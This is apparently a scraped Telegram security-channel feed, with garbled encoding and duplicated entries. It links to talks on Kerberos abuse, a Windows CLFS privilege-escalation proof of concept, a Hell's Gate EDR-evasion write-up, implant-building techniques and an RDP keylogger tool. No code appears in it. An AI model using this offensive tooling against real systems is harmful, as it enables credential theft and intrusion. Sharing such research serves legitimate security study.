https://www.youtube.com/watch?v=H1q-CBHbmHE
Red + Blue, How Purple Are You? Identifying Gaps in The Spectrum of Security
https://www.youtube.com/watch?v=B_2AfoT2WxU
Security Distilled: Building a First-Principles Approach to Security
https://www.youtube.com/watch?v=zjJaYwqVHxY
A Taste of Kerberos Abuse
https://www.youtube.com/watch?v=9SUXifUp9ZY
The BloodHound 4.3 Release: Get Global Admin More Often
https://www.youtube.com/watch?v=H1q-CBHbmHE
Red + Blue, How Purple Are You? Identifying Gaps in The Spectrum of Security
https://www.youtube.com/watch?v=B_2AfoT2WxU
π3π₯1
π [ ricnar456, Ricardo Narvaja ]
As promised, the research on CVE-2023-28252 is already published with its PoC and the detailed explanation of the reversing that we did with my friend @solidclt.
π https://www.coresecurity.com/core-labs/articles/understanding-cve-2022-37969-windows-clfs-lpe
π https://github.com/fortra/CVE-2023-28252
π₯ [ tweet ]
As promised, the research on CVE-2023-28252 is already published with its PoC and the detailed explanation of the reversing that we did with my friend @solidclt.
π https://www.coresecurity.com/core-labs/articles/understanding-cve-2022-37969-windows-clfs-lpe
π https://github.com/fortra/CVE-2023-28252
π₯ [ tweet ]
π₯6
This media is not supported in your browser
VIEW IN TELEGRAM
ΠΠΎΠ»ΠΈΡΡΠ°Π» ΡΠ²ΠΈΡΡΠ΅Ρ Π΄ΠΎ ΡΠ΅ΠΉΡ Π»ΠΈΠΌΠΈΡΠ°, ΠΏΠΎΡΡΠΎΠΌΡ Π²ΠΌΠ΅ΡΡΠΎ ΠΏΠΎΡΡΠΎΠ² ΠΏΡΠΎ ΠΏΠ΅Π½Π΅ΡΡΠ΅ΡΡΡ Π²ΠΎΡ
π’8π3π₯2
π [ VirtualAllocEx, Daniel Feichter ]
Although the Hell's Gate POC is a few years old, I was interested in understanding it in more detail.
So I wrote the new blog post "Exploring Hell's Gate" - an in-depth look at Hell's Gate.
π https://redops.at/en/blog/exploring-hells-gate
π₯ [ tweet ]
Although the Hell's Gate POC is a few years old, I was interested in understanding it in more detail.
So I wrote the new blog post "Exploring Hell's Gate" - an in-depth look at Hell's Gate.
π https://redops.at/en/blog/exploring-hells-gate
π₯ [ tweet ]
π1
π [ _RastaMouse, Rasta Mouse ]
[BLOG]
Short post showing how C# Source Generators could be used to build customisable implants.
π https://rastamouse.me/csharp-source-generators/
π₯ [ tweet ]
[BLOG]
Short post showing how C# Source Generators could be used to build customisable implants.
π https://rastamouse.me/csharp-source-generators/
π₯ [ tweet ]
π1
π [ D1rkMtr, D1rkMtr ]
A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes, It utilizes a low-level keyboard input hook, allowing it to record keystrokes in certain contexts (like in mstsc.exe and CredentialUIBroker.exe)
π https://github.com/TheD1rkMtr/TakeMyRDP
π₯ [ tweet ]
A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes, It utilizes a low-level keyboard input hook, allowing it to record keystrokes in certain contexts (like in mstsc.exe and CredentialUIBroker.exe)
π https://github.com/TheD1rkMtr/TakeMyRDP
π₯ [ tweet ]
π4